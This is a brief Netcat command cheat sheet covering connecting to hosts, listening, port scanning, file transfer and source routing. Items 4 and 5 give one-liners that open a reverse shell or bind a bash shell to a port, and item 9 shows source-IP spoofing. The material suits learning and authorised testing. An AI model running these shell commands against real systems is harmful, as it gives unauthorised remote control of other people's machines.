Netcat is a command-line tool that reads and writes data across networks using the TCP and UDP protocols. It is known as the “network Swiss army knife” because of the many different functions it can perform.
The following list provides a quick usage guide for the most useful Netcat commands.
1. Connect to a port on a remote host
nc remote_host <port>
2. Connect to multiple ports on a remote host
nc remote_host <port>…<port>
For example: nc www.techhyme.com 21 25 80
3. Listen on a port for incoming connections
nc -v -l -p <port>
4. Connect to remote host and serve a bash shell
nc remote_ip <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To make Netcat support the -e flag, it must be re-compiled with the DGAPING_SECURITY_HOLE option.
5. Listen on a port and serve a bash shell upon connect
nc -v -l -p <port> -e /bin/bash
6. Port scan a remote host
nc -v -z remote_host <port>-<port>
Use the -i flag to set a delay interval:
nc -i <seconds> -v –z remote_host <port>-<port>
7. Pipe command output to a netcat request
<command> | nc remote_host <port>
echo “GET / HTTP/1.0
“| nc www.techhyme.com 80
8. Use source-routing to connect to a port on a remote host
nc -g <gateway> remote_host <port>
Note: Up to eight hop points may be specified using the -g flag. Use the -G flag to specify the source-routing pointer.
9. Spoof source IP address
Use the -s flag to spoof the source IP address:
nc -s spoofed_ip remote_host port
This command will cause the remote host to respond back to the spoofed IP address. The -s flag can be used along with most of the commands presented in this table.
10. Transfer a file
On the server host:
nc -v -l -p <port> < <file>
On the client host:
nc -v <server_host> <port> > <file>
It is also possible for the client host to listen on a port in order to receive a file. To do this, run the following command on the client host:
nc -v -l -p <port> > file
And run the following command on the server host:
nc -v <client_host> <port> < file